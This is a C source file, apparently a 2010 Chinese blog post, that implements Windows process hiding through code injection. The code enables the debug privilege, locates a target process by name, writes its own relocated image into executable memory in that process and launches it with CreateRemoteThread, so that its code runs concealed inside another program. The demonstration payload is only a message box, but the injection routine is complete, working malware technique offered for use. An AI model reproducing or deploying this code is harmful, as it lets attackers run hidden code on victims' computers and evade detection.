#include "stdio.h"
#include "windows.h"

#ifdef _DEBUG
#define MsgBox(lpText)         MessageBox(NULL,lpText,NULL,NULL)
#else
#define MsgBox(lpText)
#endif

#define LOAD_BASE_ADDR 0x03140000
#define SIZE_OF_NT_SIGNATURE (sizeof(DWORD))
#define OPTHDROFFSET(ptr) ((LPVOID)((BYTE *)(ptr)+((PIMAGE_DOS_HEADER)(ptr))->e_lfanew+SIZE_OF_NT_SIGNATURE+sizeof(IMAGE_FILE_HEADER)))

typedef BOOL (WINAPI* p_EnumProcesses )(DWORD * lpidProcess,DWORD   cb,  DWORD * cbNeeded   );//定义一个函数指针
typedef BOOL (WINAPI* p_EnumProcessModules )( HANDLE hProcess, HMODULE *lphModule, DWORD cb, LPDWORD lpcbNeeded );
typedef DWORD (WINAPI* p_GetModuleBaseName) ( HANDLE hProcess, HMODULE hModule, LPSTR lpBaseName, DWORD nSize );



HMODULE m_module;
BOOL m_bIsWinNT;


////////////////////////
//获取系统版本
///////////////////////
void GetOSVersion(void)
{
        OSVERSIONINFO osvi;
        osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
        if(GetVersionEx(&osvi)==FALSE) {
                MsgBox("Unable to get version info GetOSVersion()");
        }
        if(osvi.dwPlatformId==VER_PLATFORM_WIN32s) {
                MsgBox("This application does not run under WIN32s!");
        }
        if (osvi.dwPlatformId == VER_PLATFORM_WIN32_NT) 
                m_bIsWinNT = 1;
        else 
                m_bIsWinNT = 0;
}

////////////////////////
//初始化
////////////////////////
void Init()
{
        GetOSVersion();
        m_module=GetModuleHandle(NULL);
}

//////////////////////////////
//通过名称获取进程ID
//////////////////////////////
long GetNTProcessIDbyName(char *szName)
{
        
        if((!m_bIsWinNT)||(!szName))
                return -1;        

        HMODULE hModule=LoadLibrary("psapi.dll");

        if(hModule==NULL)
                return -1;
        p_EnumProcesses pEnumProcesses=(p_EnumProcesses)GetProcAddress(hModule,"EnumProcesses");
        p_EnumProcessModules pEnumProcessModules=(p_EnumProcessModules)GetProcAddress(hModule,"EnumProcessModules");
        p_GetModuleBaseName pGetModuleBaseName=(p_GetModuleBaseName)GetProcAddress(hModule,"GetModuleBaseNameA");

        DWORD aProcesses[1024], cbNeeded, cProcesses;
    unsigned int i;
    if ( !pEnumProcesses( aProcesses, sizeof(aProcesses), &cbNeeded ) )
        return -1;
    
    cProcesses = cbNeeded / sizeof(DWORD);
    
    for ( i = 0; i < cProcesses; i++ )
        {
                char szProcessName[MAX_PATH] = "";
                
                HANDLE hProcess = OpenProcess( PROCESS_QUERY_INFORMATION |
                                                                           PROCESS_VM_READ,
                                                                           FALSE, aProcesses[i] );
                
                if ( hProcess )
                {
                        HMODULE hMod;
                        DWORD cbNeeded;
                        if ( pEnumProcessModules( hProcess, &hMod, sizeof(hMod), &cbNeeded) )
                        {
                                pGetModuleBaseName( hProcess, hMod, szProcessName, MAX_PATH );
                                if(_stricmp(szName,szProcessName)==0)
                                {
                                        CloseHandle (hProcess);
                                        return aProcesses[i];
                                }
                                
                        }
                        CloseHandle (hProcess);
                }
        }
        return -1;
}


/////////////////////////////
//提权
/////////////////////////////
BOOL EnableDebugPriv()
{
        HANDLE hToken;
        LUID sedebugnameValue;
        TOKEN_PRIVILEGES tkp;


        if ( ! OpenProcessToken( GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken ) )
        {
                MsgBox("OPT() failed");
                return FALSE;
        }

        if ( ! LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &sedebugnameValue ) )
        {
                MsgBox("LPV() failed");
                CloseHandle( hToken );
                return FALSE;
        }


        tkp.PrivilegeCount = 1;
        tkp.Privileges[0].Luid = sedebugnameValue;
        tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;


        if ( ! AdjustTokenPrivileges( hToken, FALSE, &tkp, sizeof tkp, NULL, NULL ) )
        {
                MsgBox("ATP() failed");
                CloseHandle( hToken );
                return FALSE;
        }
        CloseHandle( hToken );
        return TRUE;
}


/////////////////////////////////////
//锁定
/////////////////////////////////////
BOOL FixRelocationTable(char *szBuf, long lLen,unsigned long lMyBase,unsigned long lNewBase)
{

        DWORD lAdd=lNewBase-lMyBase;
        IMAGE_DOS_HEADER *ppeDosHead=(IMAGE_DOS_HEADER *)szBuf;//dos head
        IMAGE_NT_HEADERS32 *ppeHead=(IMAGE_NT_HEADERS32 *)(szBuf+ppeDosHead->e_lfanew);//PE head
        ppeHead->OptionalHeader.ImageBase=lNewBase;

        
        char* p=ppeHead->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress+szBuf;
        IMAGE_RELOCATION* relocblock=(IMAGE_RELOCATION*)(p);
        
        ppeHead->OptionalHeader.ImageBase=lNewBase;
        while(relocblock->VirtualAddress)
        {
                void* page  = (void *)((UINT)szBuf + (UINT)relocblock->VirtualAddress);
        long count = (relocblock->SymbolTableIndex - 8)/2;
        for(int i=0; i<count; i++) {
                        int n=*((WORD*)((char*)(&relocblock->Type)+i*sizeof(WORD)));
            int offset = n & 0xFFF;
            int type   = n >> 12;
                        //---------------------------
                        long test =(long)(char*)page+offset;
                        test-=(long)szBuf;
                        test+=lNewBase;
                        char szMsg[200];
                        sprintf(szMsg,"point->0X%X   sozeofblock %d=0x%X",test,count,count);

            switch(type) {
                case IMAGE_REL_BASED_ABSOLUTE: 
                
                    break;
                case IMAGE_REL_BASED_HIGH:
                    *(UINT *)((UINT)page+offset) += HIWORD(lAdd);
                    break;
                case IMAGE_REL_BASED_LOW:
                    *(UINT *)((UINT)page+offset) += LOWORD(lAdd);
                    break;
                case IMAGE_REL_BASED_HIGHLOW:
                    *(UINT *)((UINT)page+offset) += lAdd;

                    break;
                default:

                    break;
            }
        }
                relocblock = (IMAGE_RELOCATION *)((BYTE *)relocblock + 
                     relocblock->SymbolTableIndex);
        }
        return TRUE;
}


/////////////////////////////////////
//隐藏进程
/////////////////////////////////////
BOOL HideProcessInNTbyID(unsigned long lProcessID,LPTHREAD_START_ROUTINE pMyMainProcess)
{
        if(lProcessID==-1)
                return FALSE;
        
        if(GetCurrentProcessId()==lProcessID)
                return FALSE;

        HANDLE hProc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,lProcessID);
        
        if(hProc==NULL) 
                return FALSE;
        HMODULE lnewModule=(HMODULE) LOAD_BASE_ADDR;

        DWORD dwSize=((PIMAGE_OPTIONAL_HEADER)OPTHDROFFSET(m_module))->SizeOfImage;

        char *pMem=NULL;
        int x=0;
        while((pMem=(char *)VirtualAllocEx(hProc,lnewModule,dwSize,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE))==NULL)
        {
                lnewModule-=1024;//one page??
                if(((unsigned long)lnewModule)<0x10000)
                        return FALSE;//没有希望了
                x=GetLastError();
        }
        //pMem=(char *)VirtualAllocEx(hProc,lnewModule,dwSize,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
        if(pMem==NULL) 
        {
                MsgBox("VirtualAllocEx Error,多次分配后失敗");
                        return FALSE;
        }
        
        char szMsg[200];
        if((long)pMem!=LOAD_BASE_ADDR)
        {
                sprintf(szMsg,"old model=0X%X; new model=0X%X,pMem=0X%X; 多次分配后成功!",m_module,lnewModule,pMem);
                MsgBox(szMsg);
        }
        else
        {
                sprintf(szMsg,"old model=0X%X; new model=0X%X,pMem=0X%X; 一次分配成功!",m_module,lnewModule,pMem);
                MsgBox(szMsg);
        }

        if((long)pMem!=(long)lnewModule)
        {
                lnewModule=(HMODULE)pMem;
                MsgBox("(pMem!=lnewModule)");
        }

        DWORD dwOldProt,dwNumBytes,i;
        MEMORY_BASIC_INFORMATION mbi;
        
        
        char* pMyExeData=new char[dwSize];
        long lMyID=GetCurrentProcessId();
        HANDLE hMyProc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,lMyID);
        DWORD dRead;
        ReadProcessMemory(hMyProc,m_module, pMyExeData,dwSize,&dRead);
        
        FixRelocationTable(pMyExeData,dwSize,(unsigned long)m_module,(unsigned long)pMem);
        VirtualQueryEx(hProc,pMem,&mbi,sizeof(MEMORY_BASIC_INFORMATION));

        while(mbi.Protect!=PAGE_NOACCESS && mbi.RegionSize!=0) {
                if(!(mbi.Protect & PAGE_GUARD)) {
                        for(i=0;i<mbi.RegionSize;i+=0x1000) {
                                VirtualProtectEx(hProc,pMem+i,0x1000,PAGE_EXECUTE_READWRITE,&dwOldProt);
                                WriteProcessMemory(hProc,pMem+i,pMyExeData+i,0x1000,&dwNumBytes);
                        }
                }
                
                pMem+=mbi.RegionSize;
                VirtualQueryEx(hProc,pMem,&mbi,sizeof(MEMORY_BASIC_INFORMATION));        
        }
    VirtualFreeEx(
  hProc,
  pMem,
  dwSize,
  MEM_DECOMMIT
);

        DWORD dwRmtThdID;

        long l=(char*)lnewModule-(char*)m_module;
        HANDLE hRmtThd=CreateRemoteThread(hProc,NULL,0,
                (LPTHREAD_START_ROUTINE)((long)pMyMainProcess+(long)l),
                (LPVOID)lnewModule,0,&dwRmtThdID);
        if(hRmtThd==NULL) {
                MsgBox("Could create remote thread error!");
                return FALSE;
        }
        CloseHandle(hProc);
        return TRUE;
}

//隐藏
BOOL HideProcessInNT(char *szRemoteProcess,LPTHREAD_START_ROUTINE pMyMainProcess)
{
        unsigned long lProcessID=GetNTProcessIDbyName(szRemoteProcess);
        return HideProcessInNTbyID(lProcessID,pMyMainProcess);
}


BOOL HideProcessIn(char *szRemoteProcess,LPTHREAD_START_ROUTINE pMyMainProcess)
{
        EnableDebugPriv();
        if(m_bIsWinNT)
        {
        
                return HideProcessInNT(szRemoteProcess,pMyMainProcess);
        
        }

        return TRUE;
}

DWORD WINAPI MyNtRemoteThreadMain(LPVOID lpParameter)
{
        MsgBox("进程隐藏成功");
        return 0;
        
}


int main()
{
        
    Init();
        char* szRemoteProcess=new char[20];


        printf("输入要绑定的进程名:");
        scanf("%s",szRemoteProcess);

        if(HideProcessIn(szRemoteProcess,MyNtRemoteThreadMain))
        {
                MsgBox("ok");
        }
        else
        {
                MsgBox("error");
        }

        return 0;
}

posted on 2010-10-12 15:01  °ι 、曲 终  阅读(489)  评论(0编辑  收藏  举报